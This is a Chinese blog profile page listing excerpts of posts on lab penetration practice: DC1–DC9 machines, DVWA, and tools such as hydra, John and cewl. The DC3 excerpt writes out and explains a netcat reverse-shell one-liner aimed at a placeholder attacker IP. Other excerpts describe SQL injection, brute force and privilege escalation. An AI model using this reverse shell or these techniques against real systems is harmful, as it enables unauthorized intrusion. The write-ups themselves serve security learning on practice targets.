自定义博客皮肤VIP专享

*博客头图:

格式为PNG、JPG,宽度*高度大于1920*100像素,不超过2MB,主视觉建议放在右侧,请参照线上博客头图

请上传大于1920*100像素的图片!

博客底图:

图片格式为PNG、JPG,不超过1MB,可上下左右平铺至整个背景

栏目图:

图片格式为PNG、JPG,图片宽度*高度为300*38像素,不超过0.5MB

主标题颜色:

RGB颜色,例如:#AFAFAF

Hover:

RGB颜色,例如:#AFAFAF

副标题颜色:

RGB颜色,例如:#AFAFAF

自定义博客皮肤

-+
  • 博客(30)
  • 收藏
  • 关注

原创 DC9靶场练习

登录三个用户,最终在janitor的家目录下找到了隐藏文件.secrets-for-putin,在该目录下有个密码文本。上面sqlmap爆破数据库的时候,有一个数据库是users,试试从这个库里寻找线索。3,接下里是参考别人的文章进行下去的,需要利用knockd服务。1,思路:search页面有个搜索框,有可能存在POST注入。获取到账号:admin 密码:transorbital1。将用户名和密码都保存到文件中,用hydra进行破解。将该密码本保存下来,再次进行爆破。得到了新用户fredf的密码。

2023-06-30 03:19:50 149

原创 DC8靶场练习

在contact us>webform>form settings中发现可以上传PHP代码,上传一个反弹shell的代码。思路:当点击该页面的“welcome to DC8”字样时,发现上面的url变化为“原因:这个报错是由于windows系统下编辑然后上传到Linux系统执行导致的。开启监听之后,在contact us中提交一个留言来反弹shell。解决方案:本地编辑查看文件类型:set ff=unix。”,该页面有可能存在SQL注入漏洞。接着运行该文件,发现还是没法运行。查询该数据库下的表名。

2023-06-29 05:29:32 137

原创 DC7靶场练习

这个靶场大部分都是参考别人的,后期再重新过一遍吧。

2023-06-27 21:35:26 137

原创 DC6靶场练习

有2点需要注意:一,需要编辑hosts文件才能访问网站;二,给了一条线索,是一个密码文件。

2023-06-27 17:15:32 112

原创 DC4靶场练习

思路:在www-data用户上,我先是查看了SUID提权,发现了/home/jim/test.sh这个文件具有SUID权限,试着用这个文件提权,但是www-data用户并没有/bin/sh 和/bin/bash。后来在参考了别人的笔记,在ssh登录jim成功时,有一封邮件我并没有注意到,查看了该邮件里面有charles用户的密码,切换到charles用户,使用sudo -l命令查询,发现/usr/bin/teehee文件具有sudo权限,可以进行提权。1,登录成功以后,页面是3个命令显示。

2023-06-24 22:34:29 64

原创 DC3靶场练习

bin/bash -i 2>&1 | nc IP 端口 >/tmp/f: 先将上一步获取到的命令在bash终端中执行,并将结果通过nc输出到目标,并且将目标的命令重新写入临时文件f.mkfifo /tmp/f;cat /tmp/f | /bin/sh -i 2>&1 | nc 攻击者ip 端口 > /tmp/f。1,rm /tmp/f: 首先删除l临时文件f,以免造成冲突,(后面的分号;3, cat /tmp/f | /bin/bash -i 2>&1 | nc IP 端口 >/tmp/f。

2023-04-11 22:09:29 291

原创 John密码破解工具

ohn 是一款大受欢迎的、免费的开源软件、基于字典的密码破解工具。它支持多种不同类型的系统架构,包括 Unix 、 Linux 、 Windows 、 DOS 模式、 BeOS 和 OpenVMS ,主要目的是破解不够牢固的 Unix/Linux 系统密码。--rules 打开字典模式的词汇表切分规则(在字典的基础上再添加些变化,例如字典中有单 词test,则john还会尝试使用tes、teSt、 tset等单词变化进行解密)自带了一个字典,字典位于。

2023-04-11 21:36:09 1700

原创 ExploitDB漏洞库

ExploitDB 是一个面向全世界黑客的漏洞提交平台,该平台会公布最新漏洞的相关情况,这些可以帮助企业改善公司的安全状况,同时也以帮助安全研究者和渗透测试工程师更好的进行安全测试工作。--nmap [file.xml] 使用服务版本检查Nmap XML输出中的所有结果(例如:nmap -sV -oX file.xml),使用“-v”(详细)来尝试更多的组合。-p 显示漏洞利用的完整路径(如果可能,还将路径复制到剪贴板),后面跟漏洞ID号。--id 显示EDB-ID。

2023-04-11 20:57:52 776

原创 DC2靶场练习

通过以上扫描报告可以看出,虽然没有扫描出漏洞,但是却意外获得了三个用户名:admin,tom,jerry.和flag1的提示相呼应,所以现在需要做的就是使用cewl工具进行密码收集

2023-04-09 15:26:36 200

原创 rbash限制以及绕过

rbash,即受限制的 bash,其可以用作中转服务器(实际上rbash只是bash的一个软链接)。它与一般shell的区别在于会限制一些行为,让一些命令无法执行。

2023-04-09 15:20:52 642

原创 cewl工具

-auth_type ,--auth_user, --auth_pass:目标网站需要进行页面登录认证的话,使用该参数来绕过页面认证的限制。--proxy_port:目标网站设置了代理服务器的话,–proxy option选项来启用代理URL功能,默认端口是8080。--debug:开启调试模式,这样就可以查看网站爬取过程中出现的错误和元数据了。3,从网站中获取Email,-n选项来隐藏工具在爬取网站过程中生成的密码字典。--with-numbers:生成包含数字和字符的字典文件。

2023-04-08 17:16:48 450 1

原创 DC1靶场练习

大概意思就是查找passwd文件来找寻flag4文件,但是前面我们已经提权成功利用find命令找到了flag4文件,所以现在直接查看就行。思路:现在我们可以登录进来数据库,可以采用替换的方式,找到靶机的加密算法,将我们设定的密码转换成哈希密码,替换users表中的密码。已经查找到了用户名和密码,但是密码已经被加密了,采用的是哈希密码,破解难度比较大。搜索到drupal7的配置文件是settings.php ,查找该文件。开放端口:22,80,111,36890.三,漏洞利用(获取webshell)

2023-04-08 14:30:02 262

原创 PHPstudy搭建网站靶场

这个 PHP探针页面对应的 是l.php这个文件,访问目标IP想是WEB目录页面,可以把l.php这个文件名改下就可以了。在php.ini文件中将allow_url_include设为为On,然后重启apache。一,安装PHPstudy(我是在winserver2016上安装的)将DVWA文件存放到www目录下。二,搭建DVWA靶场。

2023-03-30 21:17:29 370

原创 如何绕过CDN查找真实IP

目录一,CDN是什么?二,如何判断网站是否存在CDN?三,如何绕过CDN CDN英文全称,中文翻译即为内容分发网络。它是建立并覆盖在承载网之上,由分布在不同区域的边缘节点服务器群组成的分布式网络。简单理解就是在当地设立的分点不需要直接链接总部了。 CDN的工作原理就是将源站的资源缓存到位于全国各地的CDN节点上,用户请求资源时,就近返回节点上缓存的资源,而不需要每个用户的请求都回您的源站获取,避免网络拥塞、分担源站压力,保证用户访问资源的速度和体验。 1,

2023-01-22 15:18:47 4016 3

原创 内网基础知识

这时候,我们改变一下,在A和B域中都各建立一个全局组(G),然后在B域中建立一个DL,把这两个G都加入B域中的DL中,然后把FINA的访问权赋给DL。因为DL是在B域中,所以管理权也在B域,如果A域中的5个人变成6个人,那只能A域管理员通知B域管理员,将DL的成员做一下修改,B域的管理员太累了。域是一个有安全边界的计算机集合(安全边界的意思就是在两个域中,一个域中的用户没法访问另一个域中的资源),可以理解为升级版的工作组(人人不平等,集中管理,统一管理)。成员范围:所有的域,但不能是任何一个域内本地域组。

2022-12-17 16:33:33 135

原创 常见CMS系统总结

国内唯一还在维护的ASP开源cms,当动易风讯这些厂商放弃ASP时,很多ASP用户都转向了科讯,造就了今日科讯戴着望远镜都找不着对手的境界,虽然这种境界来的晚了点,但科讯还是比较享受的,这是科讯幸运的地方,官方网站也将国内唯一还在维护ASP开源cms作为选择科讯的重要理由之一,不管怎么说,这份坚持的精神,还是挺让人敬佩的。一款先进的ASP.net CMS内容管理系统,它特点也众多:完美融合手机、超强自定义扩展、集成多款编辑器、全文检索等,它还集成多种实用功能在线考试系统、问答系统等。

2022-09-28 10:36:13 2451

原创 漏洞复现(Vulhub)-Apache HTTPD 换行解析漏洞(CVE-2017-15715)

原理:apache-CVE-2017-15715 的出现是由于apache 在修复第一个后缀名解析漏洞时,使用 正则表达式匹配后缀,在解析php时xxx.php\\x0A 将被php后缀进行解析,导致绕过一些服务器的安全策略。命令含义:--zone #作用域 --add-port=80/tcp #添加端口,格式为:端口/通讯协议 --permanent #永久生效,没有此参数重启后失效。firewall-cmd --list-ports 查看所有开启的端口。成功出现php配置文件界面,说明解析成功。

2022-09-20 20:40:11 1258

原创 漏洞复现-永恒之蓝(MS17-010)

永恒之蓝是指2017年4月14日晚,黑客团体Shadow Brokers(影子经纪人)公布一大批网络攻击工具,其中包含“永恒之蓝”工具,“永恒之蓝”利用Windows系统的SMB漏洞可以获取系统最高权限。5月12日,不法分子通过改造“永恒之蓝”制作了wannacry勒索病毒,英国、俄罗斯、整个欧洲以及中国国内多个高校校内网、大型企业内网和政府机构专网中招,被勒索支付高额赎金才能解密恢复文件。

2022-09-19 21:58:59 3012

原创 DC5靶场

由上可以知道web服务器是nginx1.6.2,客户端向nginx服务器发送的每一条请求都会记录在访问日志上(客户端IP,浏览器信息,referer,请求处理时间,请求URL等都可以在访问日志中得到)。GNU Screen是一款由GNU计划开发的用于命令行终端切换的自由软件。它提供了统一的管理多个会话的界面和相应的功能。由以上可知道thankkyou.php调用footer.php,可能存在文件包含漏洞。正确的是:file=

2022-09-19 15:57:02 1102

原创 Vulub靶场搭建(Linux)以及中间件

1,在未安装过Docker的机器上,root权限执行如下命令即可一键安装最新版Docker:2,安装docker-compose:此时发现需要Python3版本而且没有安装PiP3,安装python3和pip a,切换到家目录下载好文件包好找:cd b,下载python-3.7.0.tar c,安装依赖包 d,解压并进入解压后的目录 e,编译与安装 f,进行软链接 g,安装PiP 对PiP进行软链接: 验证是否成功 4,此时再安装docker-c

2022-06-27 19:51:54 571

原创 DVWA-CSRF(跨站请求攻击)

直接在url 中把password_new和password_conf改成一样的,就可以修改密码了添加了referer验证,stripos()函数查找字符串在另一字符串中第一次出现 的位置(不区分大小写),如果没找到字符串则返回FALSE使用BP抓包三,hight故意输错,发现url中添加了Token验证分析:High级别的代码加入了Anti-CSRF token机制,用户每次访问改密页面时,服务器都会返回一个随机的token,当浏览器向服务器发起请求时,需要提交token参数,而服

2022-06-27 00:11:14 88

原创 DVWA-命令注入

命令注入漏洞的函数:system(),exec(),passthru(),shell_exec(),''(与shell_exec()功能相同。1,分析源码使用的函数是shell_exec()2,验证3,漏洞测试| :前面命令的输出结果作为后面命令的输入;||:前面的命令执行失败以后才会执行后面的命令;&:前面的命令执行后接着执行候命的命令;&&:前面的命令执行成功以后才可以执行下面的命令。存疑:当使用;连接时,出现错误原因是DVWA的服务器是winserver2008,” ; “分号是应用在linux系统中

2022-06-26 23:49:56 1646

原创 DVWA-暴力破解

说明账号是admin 密码是password2,暴力破解扩展:hydra(九头蛇)支持的协议:命令参数:刚开始用Win10 尝试使用SMB协议攻破登录密码,一直出现后来使用namp扫了下发现445端口并没有打开,后来使用Win2008做实验,小插曲:user.txt和pass.txt放在桌面上不能直接使用,需要写路径,直接放到主文件夹里面直接指定就行了,不需要写路径。重点:要先用namp扫一下对应的端口有没有打开!!!...

2022-06-26 23:46:41 703

原创 DVWA-JavaScript Attacks

JavaScript是一种基于对象和事件驱动的、并具有安全性能的脚本语言。是一种解释型语言(代码不需要进行预编译)。通常JavaScript脚本是通过嵌入在HTML中来实现自身的功能的。若是涉及到Cookie、Session等记录用户信息的脚本,应该通过外部引入方式,并且不能暴露文件路径,控制好文件访问权限,若被攻击者获取到重要脚本代码,则能伪造其他合法用户进行伪造。 源码分析:从代码中可以看出token不是后台生成的,而是前台生成的。前台生成的是MD5(“changeme"),而后台需要的是MD5

2022-06-26 23:41:36 102

原创 DVWA-CSP Bypass

CSP(Content-Security-Policy):指的是内容安全策略,它的本质是建立一个白名单,告诉浏览器哪些外部资源可以 加载和执行。我们只需要配置规则,如何拦截由浏览器自己来实现。通常有两种方式来开启 CSP,一种是设置 HTTP 首部中的 Content-Security-Policy,一种 是设置 meta 标签的方式 CSP 也是解决 XSS 攻击的一个强力手段script-sr...

2022-06-26 21:04:43 389

原创 DVWA-弱会话ID

如果没有变量$_SESSION['last_session_id'],则变量值设置为0,变量值加1;如果有变量$_SESSION['last_session_id'],则变量值加1。然后向用户发送名为dvwaSession,值为$_SESSION['last_session_id']的HTTP cookie。也就是说,名为dvwaSession的cookie的值从1开始每按一次Generate按钮递增1。setcookie()函数的作用是向客户端发送一个 HTTP cookie。火狐浏览器 :点击“检查-存

2022-06-26 19:28:53 636

原创 DVWA-不安全的验证码

出现该问题是因为使用reCAPTCHA没有申请密钥,需要手动填入密钥,打开config.inc.php配置文件,找到改为:漏洞介绍:CAPTCHA项目是Completely Automated Public Turing Test to Tell Computers and Humans Apart (全自动区分计算机和人类的图灵测试)的简称,是一种区分用户是计算机和人的公共全自动程序。使用CAPTCHA可以防止计算机恶意破解密码、刷单等,保证用户是人类(无法快速反复发送请求)。攻击者绕过C

2022-06-26 15:20:34 2040

原创 DVWA-XSS

1,LOW先使用进行检测可以弹出窗口 代码分析:直接引用了name参数,并没有做任何的过滤与检查。2,Medium源码分析:使用str_replace函数将”"标签转换为空。可以使用JS伪协议: 还可以使用双写或者大小写转换,Html事件进行弹窗,这里不一 一 展示了双写:alert(/xss/)大小写转换:alert(/xss/)事件触发:...

2022-06-25 18:24:40 256

原创 DVWA-SQL注入

显示不同说明存在联合查询,接下来该确定注入类型是数字型还是字符型 判断回显 利用回显获取信息 mysql5以上默认在数据库中存放一个information_schema 的数据库,这个数据库中,需要记住三个表名,分别是SCHEMATA、TABLES和COLUMNS。SCHEMATA表存储用户创建的所有数据库的库名,只要记住该表中的字段SCHEMA_NAME,这个表中记录了数据库库名。TABLES表存储用户创建的所有数据库 库名和表名,字段分别为:TABLES_SCHEMA和TABLES_NAME。C

2022-06-25 11:24:16 1144

原创 DVWA-文件上传与文件包含

1,代码分析:从以上代码可以看出并没有做任何限制,先用最简单的PHP一句话代码试下:使用中国蚁剑进行连接 扩展:使用中国蚁剑连接出现以下情况是路径地址错误 出现”返回数据为空“,是代码有错误;basename()函数:返回带有文件扩展名的文件名部分。例如:/xx/test.php,返回test.php代码分析:继续上传yjh.php,使用BP进行抓包,更改文件类型扩展:[$_FILES’userfile’][‘name’]客户端机器文件的原名称。[$_FILES’userfile’][‘type

2022-06-23 20:18:27 2985

空空如也

空空如也

TA创建的收藏夹 TA关注的收藏夹

TA关注的人

提示
确定要删除当前文章?
取消 删除